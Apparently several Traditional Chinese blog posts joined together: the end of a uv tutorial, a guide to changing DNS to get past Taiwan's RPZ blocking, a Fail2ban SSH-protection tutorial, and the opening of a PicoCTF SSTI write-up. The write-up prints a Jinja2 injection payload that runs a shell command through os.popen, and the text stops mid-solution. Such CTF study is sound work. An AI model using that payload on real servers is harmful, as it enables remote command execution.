:::important 文檔很重要，文檔很重要，文檔很重要，因為很重要所以要說三次，如果同事不愛寫文檔，那祝你好運 :::

## 安裝依賴

### 使用 uv
\`\`\`bash
uv sync
\`\`\`

### 使用 pip
\`\`\`bash
pip install -r requirements.txt
\`\`\`

定期同步：如果維護兩種文件，記得在添加依賴後更新 requirements.txt

使用 pre-commit hook：自動同步依賴文件

# .git/hooks/pre-commit
#!/bin/bash
if [ -f pyproject.toml ]; then
    uv pip compile pyproject.toml -o requirements.txt
    git add requirements.txt
fi

注意事項

uv 目前還在快速發展中，某些功能可能還不夠穩定
如果遇到問題，可以查看官方文檔或中文文檔
建議在新專案中使用，舊專案遷移前請做好備份

總結

uv 是一個非常強大的 Python 工具，整合了眾多功能，並且速度極快。如果你：

受夠了 pip 的慢速度
想要嘗試看看更好的依賴管理
需要管理多個 Python 版本
想要一個統一的工具鏈

那麼 uv 絕對值得一試！

參考資料

如何更改電腦與手機的 DNS 設定？完整教學指南

CHIEN (qian) — Thu, 04 Dec 2025 00:00:00 GMT

什麼是 DNS？為什麼要更改它？

DNS（Domain Name System） 是網際網路的「電話簿」，負責將網址（如 google.com）轉換成 IP 位址。

DNS 也常被用作網路審查工具。透過 DNS 污染、RPZ (Response Policy Zone) 等技術，政府或 ISP 可以封鎖特定網站。最近的例子就是台灣政府封鎖小紅書。這種手法也是中國**網路長城（GFW）**的手段之一，不過 GFW 還結合了 IP 封鎖、深度封包檢測（DPI）等更複雜的技術。

更改 DNS 的好處

提升網路速度：某些 DNS 伺服器回應更快
增強安全性：防止釣魚網站和惡意軟體
改善隱私：避免 ISP 追蹤瀏覽記錄
繞過網路限制：訪問被封鎖的網站（如小紅書）

:::important 更改為國際公共 DNS(如 Google 8.8.8.8 或 Cloudflare 1.1.1.1)可繞過 DNS 封鎖,但請注意可能涉及法律問題,使用前請自行評估風險。 :::

DNS 提供商	主要 DNS	備用 DNS	特色
Google	`8.8.8.8`	`8.8.4.4`	速度快、穩定性高、全球覆蓋
Cloudflare	`1.1.1.1`	`1.0.0.1`	注重隱私、速度最快
Quad9	`9.9.9.9`	`149.112.112.112`	主打安全性

電腦端設定

:::tip 最快方法：想快速繞過 DNS 封鎖（如小紅書），建議先試「方法一：瀏覽器設定」，幾秒鐘就能完成！ :::

方法一：瀏覽器設定（最簡單）

現代瀏覽器內建安全 DNS（DoH）功能，最快速且不影響系統。

Chrome / Edge / Brave

點選右上角 ⋮ > 「設定」> 「隱私權和安全性」> 「安全性」
啟用「使用安全 DNS」，選擇 Google Public DNS 或 Cloudflare
立即生效，無需重啟

Firefox

點選 ☰ > 「設定」> 「隱私權與安全性」
勾選「啟用 DNS over HTTPS」
選擇 Cloudflare 或 Google

:::note 優點：只影響瀏覽器，適合快速測試
限制：其他應用程式仍使用系統 DNS :::

方法二：Windows 系統設定

圖形介面

按 Win + I > 「網路和網際網路」> 「進階網路設定」> 「變更介面卡選項」
在網路連線上按右鍵 > 「內容」
雙擊「網際網路通訊協定第 4 版 (TCP/IPv4)」
選擇「使用下列的 DNS 伺服器位址」
- 慣用：8.8.8.8
- 其他：8.8.4.4
點選「確定」

PowerShell（進階）

# 以系統管理員身分執行
Set-DnsClientServerAddress -InterfaceAlias "Wi-Fi" -ServerAddresses ("8.8.8.8","8.8.4.4")

方法三：macOS 系統設定

Apple 選單 > 「系統設定」> 「網路」
選擇連線 > 「詳細資料」> 「DNS」
點選 + 新增 DNS：8.8.8.8 和 8.8.4.4
點選「好」> 「套用」

終端機方式：

sudo networksetup -setdnsservers Wi-Fi 8.8.8.8 8.8.4.4

手機端設定

iOS

「設定」> 「Wi-Fi」> 點選網路旁的 ⓘ
「設定 DNS」> 選擇「手動」
刪除現有 DNS，新增 8.8.8.8 和 8.8.4.4
點選「儲存」

:::tip 推薦安裝 Google 或 Cloudflare 的 App (如 1.1.1.1) 啟用加密 DNS :::

Android

私人 DNS（推薦，Android 9+）

「設定」> 「網路和網際網路」> 「私人 DNS」
選擇「私人 DNS 提供者主機名稱」
輸入：
- Cloudflare：1dot1dot1dot1.cloudflare-dns.com
- Google：dns.google
點選「儲存」

:::important 私人 DNS 使用 DoT 協定，提供更好的隱私保護 :::

Wi-Fi 設定

長按 Wi-Fi 網路 > 「修改網路」> 「進階選項」
IP 設定改為「靜態」
DNS 1：8.8.8.8，DNS 2：8.8.4.4

如何測試 DNS 是否生效？

線上檢測

命令列

# Windows/macOS/Linux
nslookup google.com

查看輸出中的「Server」欄位，應顯示你設定的 DNS。

常見問題 FAQ

Q1: 更改 DNS 會影響網路速度嗎？

可以稍微提升速度，但差異不明顯。最大好處是穩定性和安全性。

Q2: 我該選擇哪個 DNS？

一般使用者：Google (8.8.8.8) 或 Cloudflare (1.1.1.1)
注重隱私：Cloudflare (1.1.1.1)
注重安全：Quad9 (9.9.9.9)

Q3: 如何恢復預設設定？

將 DNS 改回「自動取得」或「DHCP」即可。

Q4: 什麼是 RPZ？台灣有封鎖網站嗎？

RPZ (Response Policy Zone) 是 DNS 層級的內容過濾技術。台灣自 2020 年起要求電信業者實施 RPZ，原意是防詐騙，但出現爭議：

🚫 某些網站僅憑公文就被封鎖
⚠️ 誤封事件：Instagram、小紅書等
📋 缺乏申訴管道

:::warning 更改 DNS 訪問被誤封的合法網站（如小紅書）是合理自保，但訪問明顯違法內容仍可能觸法。 :::

Q5: 更改 DNS 就能完全翻牆了嗎？

不完全是。DNS 封鎖只是網路審查的一種：

✅ DNS 封鎖：更改 DNS 可繞過（台灣 RPZ、中國 DNS 污染）
❌ IP 封鎖：需要 VPN
❌ 深度封包檢測（DPI）：需要 VPN

中國的 GFW 同時使用三種技術，單純更改 DNS 無法突破。但台灣目前僅 DNS 層級封鎖，更改 DNS 就足夠。

結語

更改 DNS 是簡單有效的網路優化方式，幾分鐘就能完成。無論是提升速度、安全性或隱私保護，都值得一試！

:::note 延伸閱讀：

Fail2ban SSH 防護完整使用教學：安裝、設定與參數詳解

CHIEN (qian) — Wed, 10 Dec 2025 00:00:00 GMT

簡介

Fail2ban 是一款強大的開源入侵防禦工具，專門用於保護 Linux 系統免受暴力破解攻擊。它透過即時監控系統日誌檔案，自動偵測異常登入行為，並將可疑的 IP 位址加入防火牆黑名單，有效提升伺服器的安全性。

對於暴露在公網上的 SSH 服務來說，Fail2ban 是不可或缺的第一道防線，能夠有效阻擋自動化的密碼暴力破解攻擊。

安裝 Fail2ban

Ubuntu / Debian 系統

使用 APT 套件管理器安裝 Fail2ban：

sudo apt-get update
sudo apt-get install fail2ban -y

安裝完成後，Fail2ban 服務會自動啟動。

基礎設定

主要設定檔案

Fail2ban 的主要設定檔位於 /etc/fail2ban 目錄下。核心設定檔為 /etc/fail2ban/fail2ban.conf。

重要提醒：為避免套件更新時覆蓋你的自訂設定，我們需要建立一個本地設定檔 /etc/fail2ban/fail2ban.local，所有修改都在此檔案中進行。

複製預設設定檔：

sudo cp /etc/fail2ban/fail2ban.conf /etc/fail2ban/fail2ban.local

設定開機自動啟動：

sudo systemctl enable fail2ban

設定日誌檔案位置

編輯 /etc/fail2ban/fail2ban.local，找到 [Definition] 區段，設定日誌檔案路徑：

[Definition]
logtarget = /var/log/fail2ban/fail2ban.log

修改完成後，需要手動建立日誌目錄並重啟服務（系統不會自動建立）：

sudo mkdir -p /var/log/fail2ban  # 建立日誌目錄
sudo service fail2ban restart    # 重啟服務

檢查服務狀態

重啟完成後，可以檢查 Fail2ban 服務是否正常運作：

sudo service fail2ban status

如果設定正確，你會看到類似以下的輸出：

● fail2ban.service - Fail2Ban Service
     Loaded: loaded (/usr/lib/systemd/system/fail2ban.service; enabled; preset: enabled)
    Drop-In: /run/systemd/system/service.d
             └─zzz-lxc-service.conf
     Active: active (running) since Wed 2025-12-10 13:14:12 CST; 3s ago
 Invocation: 5d78b37f2bc84ac891657d15c7014770
       Docs: man:fail2ban(1)
   Main PID: 4002 (fail2ban-server)
      Tasks: 5 (limit: 14406)
     Memory: 25M (peak: 25M)
        CPU: 66ms
     CGroup: /system.slice/fail2ban.service
             └─4002 /usr/bin/python3 /usr/bin/fail2ban-server -xf start

Dec 10 13:14:12 owo systemd[1]: Started fail2ban.service - Fail2Ban Service.
Dec 10 13:14:12 owo fail2ban-server[4002]: Server ready

Jail 監獄設定

什麼是 Jail？

jail.conf 是 Fail2ban 的核心封禁規則設定檔。Jail（監獄）定義了：

誰應該被抓：哪些行為屬於可疑或惡意？
怎麼處罰：封鎖多久？封鎖哪些端口？

建立本地 Jail 設定

同樣地，我們需要複製一份本地設定檔來避免被更新覆蓋：

sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sudo vim /etc/fail2ban/jail.local

啟用 SSH 防護

在預設狀態下，Fail2ban 對所有服務都是停用的，因此我們需要手動啟用需要的服務。以下以 SSH 為例：

在 /etc/fail2ban/jail.local 中找到或新增以下區段：

[sshd]
enabled = true                    # 啟用 SSH 防護
filter = sshd                     # 使用 sshd 過濾器
maxretry = 3                      # 最大失敗嘗試次數
bantime = 600                     # 封鎖時長（秒）
port = 22                         # SSH 服務端口
logpath = %(sshd_log)s            # SSH 日誌檔案路徑
backend = %(sshd_backend)s        # 日誌讀取後端

設定說明：

enabled = true：啟用 SSH 監獄
filter = sshd：使用預定義的 sshd 過濾規則
maxretry = 3：允許失敗 3 次後封鎖
bantime = 600：封鎖 10 分鐘（600 秒）
port = 22：監控 SSH 預設端口

修改完成後重啟服務：

sudo service fail2ban restart

實戰測試

模擬攻擊

使用另一台機器嘗試 SSH 登入，並故意輸入錯誤密碼 3 次以上。你會發現第 4 次嘗試時會出現以下錯誤訊息：

ssh: connect to host 192.168.139.231 port 22: Connection refused

這表示你的 IP 已經被 Fail2ban 成功封鎖。

檢查封鎖狀態

使用 fail2ban-client 工具檢查當前的封鎖狀態：

sudo fail2ban-client status sshd

你會看到類似以下的輸出，顯示被封鎖的 IP 以及統計資訊：

Status for the jail: sshd
|- Filter
|  |- Currently failed:	0
|  |- Total failed:	0
|  `- Journal matches:	_SYSTEMD_UNIT=ssh.service + _COMM=sshd
`- Actions
   |- Currently banned:	1
   |- Total banned:	1
   `- Banned IP list:	192.168.139.108

常用參數詳解

以下是 Fail2ban 最常用的參數說明，幫助你進行更精細的調整：

參數	說明	範例值	備註與建議
`ignoreip`	IP 白名單。Fail2ban 絕對不會封鎖這些 IP。請務必將管理用 IP、內部網路 IP 加入，避免誤鎖自己。	`127.0.0.1/8 192.168.1.5`	支援 CIDR 格式（如 `/24`），多個 IP 用空白分隔
`bantime`	封鎖時長。被偵測到的 IP 將被封鎖多久。	`1h`（1小時）<br>`1d`（1天）<br>`-1`（永久）	預設為 10 分鐘，建議至少設定為 `1h` 或更長
`findtime`	觀察時間窗口。在多久的時間內累積失敗次數。與 `maxretry` 配合使用。	`10m`（10分鐘）<br>`1d`（24小時）	設為 10m 表示攻擊者須在 10 分鐘內連續失敗才會被封鎖，超過時間則計數歸零
`maxretry`	最大容忍失敗次數。在 `findtime` 期間內允許失敗幾次。	`3`（嚴格）<br>`5`（預設）	SSH 建議設為 `3`；網頁應用可能誤觸，建議設 `5` 或更多
`enabled`	啟用開關。是否啟用該 Jail。	`true` 或 `false`	除了 `[DEFAULT]` 外，所有 Jail 預設為 `false`，需手動啟用
`port`	監控端口。指定要封鎖哪個端口的連線。	`ssh`<br>`http,https`<br>`8080`	可使用服務名稱（由 `/etc/services` 解析）或直接使用端口號
`logpath`	日誌檔案路徑。Fail2ban 讀取哪個日誌檔案來偵測攻擊。	`/var/log/auth.log`<br>`/var/log/nginx/error.log`	最常設錯的地方。必須指向服務實際寫入的日誌位置
`backend`	日誌讀取模式。指定如何讀取日誌。	`systemd`<br>`auto`	現代 Linux（Ubuntu 20+, CentOS 7+）建議 SSH 使用 `systemd`，傳統日誌檔使用 `auto` 或 `polling`
`banaction`	封鎖動作。指定使用哪個防火牆工具執行封鎖。	`iptables-multiport`<br>`ufw`<br>`nftables-multiport`	必須配合系統安裝的防火牆工具

一些花式用法

:::info 之後補上 :::

PicoCTF Web Exploitation Medium分級解題紀錄

CHIEN (qian) — Wed, 24 Dec 2025 00:00:00 GMT

Introduction

這是拿來放一些解題紀錄。如果這邊沒有出現就只有兩種可能，一種是我已經解過了，另一種是我還沒解到

SSTI2

Description

SSTI (Server-Side Template Injection) 是一種安全漏洞，發生在應用程式將使用者輸入直接嵌入到伺服器端模板引擎（如 Jinja2, Twig, Smarty）中解析時。攻擊者可以利用模板語法注入惡意指令，進而達成讀取敏感檔案、洩漏伺服器資訊，甚至執行遠端程式碼 (RCE)。

解法

1.觀察網頁在網站上觀察一下會發現有一個輸入匡，我們試試看輸入 {{7*7}} 會得到什麼輸入之後會得到一個大大的 49，這就是一個 SSTI 的漏洞，那確定有漏洞了，接下來我們可以試著輸入一些命令

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

但我們發現他顯示了 Stop trying to break me >:( 似乎有什麼限制，我們可以試試看輸入